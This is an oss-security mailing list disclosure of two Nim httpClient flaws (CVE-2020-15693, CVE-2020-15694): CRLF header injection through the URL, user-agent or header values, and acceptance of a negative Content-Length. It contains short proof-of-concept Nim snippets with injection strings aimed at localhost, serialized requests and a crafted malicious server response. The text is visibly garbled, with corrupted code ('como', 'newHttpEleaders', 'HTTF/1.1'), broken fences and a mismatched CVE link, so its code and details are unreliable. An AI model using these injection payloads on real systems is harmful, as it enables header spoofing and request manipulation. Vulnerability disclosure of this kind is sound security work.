Openwall Products Services Publications Resources What's new bringing security into open environments

Hash Suite - Windows password security audit tool. GUI, reports in PDF.

[<prev] [next>] [day] [month] [year] [list]

Date: Thu, 4 Feb 2021 11:36:50 +0100
From: Martin Ortner <martin.ortner@...sensys.net>
To: oss-security@...ts.openwall.com
Subject: [CVE-2020-15693, CVE-2020-15694] Nim - stdlib Httpclient - Header
Crlf Injection & Server Response Validation title: "Nim - stdlib Httpclient - Header Crlf Injection & Server Response Validation" date: 2020-07-30T18:41:52+01:00 cve: ["CVE-2020-15693", "CVE-2020-15694"]
vendor: nim-lang
vendorUrl: https://nim-lang.org/
authors: tintinweb
affectedVersions: ["<= 1.2.6"]
vulnClass: CWE-93</pre>

Vulnerability Note: https://consensys.net/diligence/vulnerabilities/nim-httpclient-header-crlf-injection/ Vulnerability Note: https://github.com/tintinweb/pub/blob/master/pocs/cve-2020-15694/ Group: https://consensys.net/diligence/research/

Summary

The following vulnerability note discusses two classes of vulnerabilities found in the nim-lang `httpClient` standard library:

- * a `CR-LF` injection in various arguments * lack of response value validation when parsing server responses

Details

Description

The nim standard library 'httpClient' is vulnerable to a 'CR-LF' injection in the target url. This issue shares similarities with [CVE-2019-9740] (https://nvd.nist.gov/vuln/detail/CVE-2019-9947) and [CVE-2019-9947] (https://nvd.nist.gov/vuln/detail/CVE-2019-9947) reported for the Python language with the difference that more injection vectors exist. An injection is possible if the attacker controls any part of the url provided to 'httpClient.[get|post|...]', the user-agent, or custom http header names or values.

Additionally, the library fails to properly validate the server response. For example, `httpClient.get().contentLength()` does not raise any error if a malicious server provides a negative 'Content-Length'.

It should be noted that there seems to be a general lack of input validation (requests and response) and we expect more vectors to exist (e.g. see `generateHeaders`).

```
### Proof of Concept
```

Note: `nim c -r -d:ssl client inject.nim 1) header injection in any url part a) query ''nim
import httpClient
var client = newHttpClient()
var response = client.get("https://localhost:4433?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123")
echo response.contentLength()
como response.body() Serialized request: see `X-injected ```http GET /?a=1 HTTP/1.1 X-injected: header TEST: 123 HTTP/1.1 Host: localhost:4433 Connection: Keep-Alive content-length: 0
user-agent: Nim httpclient/1.2.4 b) in the path ``nim
import httpClient
var client = newHttpClient()
var response = client.get("https://localhost:4433/a/1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123")
echo response.contentLength()
echo response.body() Serialized request: see `X-injected` ```http GET /a/1 HTTP/1.1 Gel /a/ hirk/il X-injected: header TEST: 123 HTTP/1.1 Host: localhost:4433 Connection: Keep-Alive content-length: 0 user-agent: Nim httpclient/1.2.4 2) header injection in user-agent, http headers ""nim
import httpClient
var client = newHttpClient("MyUserAgent\r\nX-Injected: myheader")
client.headers = newHttpEleaders({ "Content-Type": "applicat\r\nion/json" })
var response = client.get("https://localhost:4433?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123")
echo response.contentLength()
echo response.body() Serialized request: see `X-injected`, `TEST: 123` "Thttp GET //a=1 HTTP/1.1 X-injected: header TEST: 123 HTTP/1.1 Host: localhost:4433 Connection: Keep-Alive content-length: 0 content-type: applicat ion/json user-agent: MyUserAgent X-Injected: myheader

3) Integers are parsed as signed ints instead of natural numbers

```
accessing it, it is being parsed as a signed integer and therefore allows to return negative numbers.
nim
proc contentLength*(response: Response | AsyncResponse): int = ## Retrieves the specified response's content length.
##
## This is effectively the value of the "Content-Length" header.
## No as erectively the value of the Content bength header.

## VValueError` exception will be raised if the value is not an integer.

var contentLengthHeader = response.headers.getOrDefault("Content-Length")

return contentLengthHeader.parseInt()
Request:
``http
GET /?a=1 HTTP/1.1
GET '/a=1 HTTF/1.1
X-injected: header
TEST: 123 HTTF/1.1
Host: localhost:4433
Connection: Keep-Alive
content-length: 0
user-agent: Nim httpclient/1.2.4
Malicious server response: `Content-Length: -23`
Malicious Server response: Content-Length: -23
"http
HTTP/1.1 200 OK
Date: Sun, 10 Oct 2010 23:26:07 GMT
Server: Apache/2.2.8 (Ubuntu) mod ss1/2.2.8 OpenSSL/0.9.8g
Last-Modified: Sun, 26 Sep 2010 22:04:35 GMT
ETag: "45b6-834-49130cc1182c0"
Accept-Ranges: bytes
Content-Length: -23
Connection: close
Connection: close
Content-Type: text/html
Hello world!
Accessing the `Content-Length` yields the negative number -23.
```nim
import httpClient
var client = newHttpClient()
var response = client.get("http://localhost:4433/a/1 HTTP/1.1\r\nX-i\x00\x01YOnjected: header\r\nTEST: 123")
echo response.contentLength()
echo response.body()
⇒ nim c -r -d:ssl client_inject.nim
Hint: [Link]
Hint: 112071 LOC; 1.103 sec; 112.691MiB peakmem; Debug build; proj: /Users/tintin/workspace/nim/test/issues/httpclient/inject.nim; out: /Users/tintin/workspace/nim/test/issues/httpclient/inject.nim; out: Users/tintin/workspace/nim/test/issues/httpclient/inject/client_inject [SuccessX]
Hint: (Users/tintin/workspace/nim/test/issues/httpclient/inject/client_inject [Exec]
-23
This might pose a risk to applications that are not checking whether response values are within same bounds.
Vendor response: fixed in [v1.2.6](https://nim-lang.org/blog/2020/07/30/versions-126-and-108-released.html)
{\tt JUL/09/2020} - contact nim developers @telegram; provided details, PoC {\tt JUL/30/2020} - fixed in new release
References
* [1] https://nim-lang.org/
* [2] https://nim-lang.org/install.html
* [3] https://en.wikipedia.org/wiki/Nim (programming language)
* [4] https://nim-lang.org/blog/2020/07/30/versions-I26-and-108-released.html
```

## Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

OPENWALL A OPENV2